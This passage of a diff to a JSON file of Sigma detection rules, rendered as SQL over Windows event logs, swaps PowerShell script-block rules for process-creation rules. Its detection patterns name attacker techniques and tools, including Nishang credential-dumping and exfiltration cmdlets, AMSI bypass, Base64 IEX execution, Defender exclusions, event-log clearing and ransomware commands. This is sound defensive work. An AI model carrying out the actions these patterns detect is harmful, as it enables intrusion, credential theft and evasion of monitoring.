OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Suspicious Eventlog Clear", - "id": "0f017df3-8f5a-414f-ad6b-24aff1128278", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Clear-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Limit-EventLog %' ESCAPE '\\' OR ScriptBlockText LIKE '%Clear-WinEvent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_susp_clear_eventlog.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "PowerShell ICMP Exfiltration", - "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", - "status": "test", - "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "status": "experimental", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of System.Net.NetworkInformation.Ping class" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_icmp_exfiltration.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Testing Usage of Uncommonly Used Port", - "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "status": "test", - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative script" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_test_netconnection.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell Create Scheduled Task", - "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "status": "test", - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "author": "frack113", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Unknown" + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_cmdlet_scheduled_task.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Root Certificate Installed - PowerShell", - "id": "42821614-9264-4761-acfc-5772c3286f76", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_root_certificate_installed.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Data Compressed - PowerShell", - "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", "status": "test", - "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", - "author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1560" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ - "Highly likely if archive operations are done via PowerShell." + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_data_compressed.yml" + "filename": "proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Discovery of a System Time", + "id": "b243b280-65fe-48df-ba07-6ddea7646427", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use of the system utilities to discover system time for legitimate reason" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%time%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' AND CommandLine LIKE '%tz%' ESCAPE '\\')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_remote_time_discovery.yml" }, { - "title": "Clear PowerShell History - PowerShell", - "id": "26b692dc-1722-49b2-b496-a8258aa6371d", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070.003" + "attack.t1574.002" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_clear_powershell_history.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Suspicious Hyper-V Cmdlets", - "id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", + "title": "Powershell Defender Exclusion", + "id": "17769c90-230e-488b-a463-e05c08e9d48f", "status": "experimental", - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "author": "frack113", + "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.006" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%New-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" ], 